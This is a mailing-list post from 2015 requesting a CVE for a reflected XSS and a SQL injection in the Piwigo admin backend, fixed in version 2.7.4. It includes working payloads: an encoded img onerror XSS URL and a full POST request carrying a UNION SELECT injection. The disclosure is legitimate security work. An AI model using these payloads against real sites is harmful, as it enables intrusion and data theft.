oss-sec mailing list archives
CVE-Request -- Piwigo <= v. 2.7.3 -- Reflecting XSS- and SQLi-vulnerability in administrative backend
From: Steffen Rösemann <steffen.roesemann1986 () gmail com>
Date: Wed, 18 Feb 2015 16:38:35 +0100
Hi Steve, Josh, vendors, list. I found a reflecting XSS- and a SQL injection-vulnerability in the administrative backend of Piwigo <= v. 2.7.3. The reflecting XSS vulnerability resides in the "page" parameter used in the file admin.php which can be found in the administrative backend located here in a common Piwigo installation: http://{TARGET}/admin.php?page=plugin-AdminTools Exploit-Example: http:// {TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E The SQL injection vulnerability can as well be found in the administrative backend and can be found in the "History" functionality located here: http://{TARGET}/admin.php?page=history The SQL injection vulnerability can be exploited by appending arbitrary SQL statements in a POST request to the parameter "user": Exploit-Example: POST /piwigo/admin.php?page=history HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/piwigo/admin.php?page=history&search_id=82 Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=19rpao6bhdsn3l0u0o1im4m680; _pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532. Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 255 start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2) AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 -- &image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit The issue has been fixed in version 2.7.4, released on 17th February 2015. Can I have a CVE-ID for it? Thank you very much. Greetings from Germany. Steffen Rösemann References: [1] http://piwigo.org [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html [3] http://piwigo.org/forum/viewtopic.php?id=25179 [4] http://sroesemann.blogspot.de/2015/02/report-for-advisory-sroeadv-2015-06.html [5] http://seclists.org/fulldisclosure/2015/Feb/73
Current thread:
- CVE-Request -- Piwigo <= v. 2.7.3 -- Reflecting XSS- and SQLi-vulnerability in administrative backend Steffen Rösemann (Feb 18)